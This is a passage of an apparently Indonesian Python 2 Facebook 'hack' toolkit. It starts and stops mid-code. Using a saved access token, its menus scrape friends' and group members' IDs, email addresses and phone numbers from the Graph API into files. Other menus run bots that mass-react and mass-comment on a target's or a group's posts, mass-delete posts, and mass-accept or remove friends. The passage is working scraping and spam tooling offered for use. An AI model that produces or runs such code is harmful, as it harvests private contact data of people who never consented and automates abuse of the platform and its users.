\x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_yahoo() def grab(): os.system('clear') try: 
toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Get ID From Friends' print '║-> \x1b[1;37;40m2. Get Friends ID From Friends' print '║-> \x1b[1;37;40m3. Get ID From GRUP' print '║-> \x1b[1;37;40m4. Get Friends Email' print '║-> \x1b[1;37;40m5. Get Friends Email From Friends' print '║-> \x1b[1;37;40m6. Get Phone From Friends' print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' grab_pilih() def grab_pilih(): cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if cuih == '': print '\x1b[1;91m[!] Can\'t empty' grab_pilih() else: if cuih == '1': id_friends() else: if cuih == '2': idfrom_friends() else: if cuih == '3': id_member_grup() else: if cuih == '4': email() else: if cuih == '5': emailfrom_friends() else: if cuih == '6': nomor_hp() else: if cuih == '7': hpfrom_friends() else: if cuih == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found' grab_pilih() def id_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_id, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['data']: idfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(save_id) print '\x1b[1;91m[!] An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def idfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket) z = json.loads(r.text) save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_idt, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['friends']['data']: idfromfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def id_member_grup(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') b = open(simg, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket) s = json.loads(re.text) for i in s['data']: idmem.append(i['id']) b.write(i['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name'] print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg b.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(simg) print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def email(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: em.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(mails) print '\x1b[1;91m[!] An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def emailfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: emfromfriends.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def nomor_hp(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') url = 'https://graph.facebook.com/me/friends?access_token=' + toket r = requests.get(url) z = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for n in z['data']: x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hp.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(noms) print '\x1b[1;91m[!] An error occurred ' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def hpfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hpfromfriends.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Make file failed' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def menu_bot(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Bot Reactions Target Post' print '║-> \x1b[1;37;40m2. Bot Reactions Group Post' print '║-> \x1b[1;37;40m3. Bot Comment Target Post' print '║-> \x1b[1;37;40m4. Bot Comment Group Post' print '║-> \x1b[1;37;40m5. Mass Delete Post' print '║-> \x1b[1;37;40m6. Accept Friend Requests' print '║-> \x1b[1;37;40m7. Unfriends' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' bot_pilih() def bot_pilih(): bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if bots == '': print '\x1b[1;91m[!] Can\'t empty' bot_pilih() else: if bots == '1': menu_react() else: if bots == '2': grup_react() else: if bots == '3': bot_komen() else: if bots == '4': grup_komen() else: if bots == '5': deletepost() else: if bots == '6': accept() else: if bots == '7': unfriend() else: if bots == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found' bot_pilih() def menu_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. \x1b[1;97mLike' print '║-> \x1b[1;37;40m2. \x1b[1;97mLove' print '║-> \x1b[1;37;40m3. \x1b[1;97mWow' print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha' print '║-> \x1b[1;37;40m5. \x1b[1;97mSad' print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' react_pilih() def react_pilih(): global tipe aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] 
Can\'t empty' react_pilih() else: if aksi == '1': tipe = 'LIKE' react() else: if aksi == '2': tipe = 'LOVE' react() else: if aksi == '3': tipe = 'WOW' react() else: if aksi == '4': tipe = 'HAHA' react() else: if aksi == '5': tipe = 'SAD' react() else: if aksi == '6': tipe = 'ANGRY' react() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found' react_pilih() def react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') try: oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksi.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def grup_react(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. \x1b[1;97mLike' print '║-> \x1b[1;37;40m2. \x1b[1;97mLove' print '║-> \x1b[1;37;40m3. \x1b[1;97mWow' print '║-> \x1b[1;37;40m4. 
\x1b[1;97mHaha' print '║-> \x1b[1;37;40m5. \x1b[1;97mSad' print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' reactg_pilih() def reactg_pilih(): global tipe aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Can\'t empty' reactg_pilih() else: if aksi == '1': tipe = 'LIKE' reactg() else: if aksi == '2': tipe = 'LOVE' reactg() else: if aksi == '3': tipe = 'WOW' reactg() else: if aksi == '4': tipe = 'HAHA' reactg() else: if aksi == '5': tipe = 'SAD' reactg() else: if aksi == '6': tipe = 'ANGRY' reactg() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found' reactg_pilih() def reactg(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name'] try: oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksigrup.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... 
\x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def bot_komen(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komen.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def grup_komen(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] 
\x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komengrup.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def deletepost(): os.system('clear') try: toket = open('login.txt', 'r').read() nam = requests.get('https://graph.facebook.com/me?access_token=' + toket) lol = json.loads(nam.text) nama = lol['name'] except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...') print 52 * '\x1b[1;97m\xe2\x95\x90' asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket) asus = json.loads(asu.text) for p in asus['data']: id = p['id'] piro = 0 url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket) ok = json.loads(url.text) try: error = ok['error']['message'] print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed' except TypeError: print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved' piro += 1 except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Connection Error' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def accept(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket) friends = json.loads(r.text) if '[]' in str(friends['data']): print '\x1b[1;91m[!] 
No friends request' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in friends['data']: gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket) a = json.loads(gas.text) if 'error' in str(a): print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed' print 52 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil' print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def unfriend(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;97mStop \x1b[1;91mCTRL+C' print try: pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(pek.text) for i in cok['data']: nama = i['name'] id = i['id'] 